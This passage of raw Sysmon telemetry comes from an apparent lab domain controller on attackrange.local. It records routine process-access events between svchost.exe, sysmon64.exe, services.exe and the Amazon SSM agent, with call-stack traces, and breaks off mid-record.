10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.243{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.240{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.240{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.239{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.198{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2C00-000000007F01}2760C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.198{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3E09-5F80-2C00-000000007F01}2760C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.897{733EE690-3E09-5F80-2C00-000000007F01}2760C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=D99D0B786003034B7255BA854D2750DF,SHA256=E59FC75594AA351583476F38E8C008C2AD2119C229D9C4540EFE17AFAEF7ED34,IMPHASH=F0070935B15A909B9DC00BE7997E6112{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.182{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.